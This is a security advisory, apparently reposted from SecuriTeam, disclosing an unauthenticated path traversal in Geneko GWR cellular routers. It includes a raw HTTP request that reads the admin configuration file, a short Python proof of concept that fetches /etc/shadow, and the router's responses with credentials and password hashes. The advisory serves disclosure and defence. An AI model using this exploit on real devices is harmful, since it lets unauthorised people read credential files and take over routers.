{"id":8356,"date":"2017-07-16T14:19:04","date_gmt":"2017-07-16T22:19:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/16\/news-2130\/"},"modified":"2017-07-16T14:19:04","modified_gmt":"2017-07-16T22:19:04","slug":"news-2130","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/07\/16\/news-2130\/","title":{"rendered":"SSD Advisory \u2013 Geneko Routers Unauthenticated Path Traversal"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 16 Jul 2017 07:24:56 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3317\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3317');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series.<\/p>\n<p>Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition, smart metering, remote monitoring and management. GWG supports a variety of radio bands options on 2G, 3G and 4G cellular technologies.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have informed Geneko of the vulnerability on the 28th of May 2017, the last email we received from them was on the 7th of June 2017. We have no further updates from Geneko regarding the availability of a patch or a workaround for the vulnerability.<\/p>\n<p><span id=\"more-3317\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.<\/p>\n<p>By sending the following GET request, You get direct access to the configuration file, which allows you to log in to the login panel:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-596be65805a8b496836988\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/mnt\/flash\/params\/j_admin_admin.params HTTP\/1.1  Host:   User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko\/20100101 Firefox\/53.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: de,en-US;q=0.7,en;q=0.3  Connection: close  Upgrade-Insecure-Requests: 1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0041 seconds] -->  <\/p>\n<p>Router response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-596be65805a9a943197901\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Content-Type: application\/octet-stream  Content-Length: 121    {&#8220;enable&#8221;:true,&#8221;username&#8221;:&#8221;admin&#8221;,&#8221;password\u201d:&#8221;xxx!&#8221;,&#8221;web_access&#8221;:0,&#8221;http_port&#8221;:80,&#8221;https_port&#8221;:443,&#8221;gui_timeout&#8221;:15}    In this case, the admin user is configured to have access to the shell (SSH Access) as can be seen in the \/etc\/passwd    admin:x:0:0:root:\/root:\/root\/cli<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9a943197901-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9a943197901-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9a943197901-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9a943197901-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9a943197901-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9a943197901-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9a943197901-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9a943197901-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9a943197901-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-596be65805a9a943197901-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9a943197901-2\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">octet<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">stream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9a943197901-3\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">121<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9a943197901-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9a943197901-5\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;enable&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;username&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;admin&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;password\u201d:&#8221;<\/span><span class=\"crayon-v\">xxx<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-s\">&#8220;,&#8221;<\/span><span class=\"crayon-v\">web<\/span><span class=\"crayon-sy\">_<\/span>access<span class=\"crayon-s\">&#8220;:0,&#8221;<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-sy\">_<\/span>port<span class=\"crayon-s\">&#8220;:80,&#8221;<\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-sy\">_<\/span>port<span class=\"crayon-s\">&#8220;:443,&#8221;<\/span><span class=\"crayon-v\">gui<\/span><span class=\"crayon-sy\">_<\/span>timeout&#8221;<span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9a943197901-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9a943197901-7\"><span class=\"crayon-st\">In<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">admin <\/span><span class=\"crayon-e\">user <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">configured <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">have <\/span><span class=\"crayon-e\">access <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">shell<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">SSH <\/span><span class=\"crayon-v\">Access<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">seen <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">the<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">passwd<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9a943197901-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9a943197901-9\"><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cli<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><u>path_traversal.py<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-596be65805a9f536632647\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import requests  import sys  domain = sys.argv[1]  r = requests.get(&#8220;http:\/\/&#8221;+domain+&#8221;\/..\/..\/..\/..\/..\/etc\/shadow&#8221;)  print r.content<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9f536632647-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9f536632647-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9f536632647-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805a9f536632647-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805a9f536632647-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-596be65805a9f536632647-1\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9f536632647-2\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9f536632647-3\"><span class=\"crayon-v\">domain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805a9f536632647-4\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">domain<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/..\/..\/..\/..\/..\/etc\/shadow&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805a9f536632647-5\"><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>The router then will response with:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-596be65805aa4605660168\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> root:$1$ryjw5yTs$xoQlzavABZ5c7gQuD7jKO0:10933:0:99999:7:::  bin:*:10933:0:99999:7:::  daemon:*:10933:0:99999:7:::  adm:*:10933:0:99999:7:::  lp:*:10933:0:99999:7:::  sync:*:10933:0:99999:7:::  shutdown:*:10933:0:99999:7:::  halt:*:10933:0:99999:7:::  uucp:*:10933:0:99999:7:::  operator:*:10933:0:99999:7:::  nobody:*:10933:0:99999:7:::  admin:$1$72G6z9YF$cs5dS2elxOD3qicUTlEHO\/:10933:0:99999:7:::<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-596be65805aa4605660168-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-596be65805aa4605660168-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-1\"><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">ryjw5yTs<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">xoQlzavABZ5c7gQuD7jKO0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-2\"><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-3\"><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-4\"><span class=\"crayon-v\">adm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-5\"><span class=\"crayon-v\">lp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-6\"><span class=\"crayon-v\">sync<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-7\"><span class=\"crayon-v\">shutdown<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-8\"><span class=\"crayon-v\">halt<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-9\"><span class=\"crayon-v\">uucp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-10\"><span class=\"crayon-v\">operator<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-596be65805aa4605660168-11\"><span class=\"crayon-v\">nobody<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-596be65805aa4605660168-12\"><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">72G6z9YF<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cs5dS2elxOD3qicUTlEHO<\/span><span 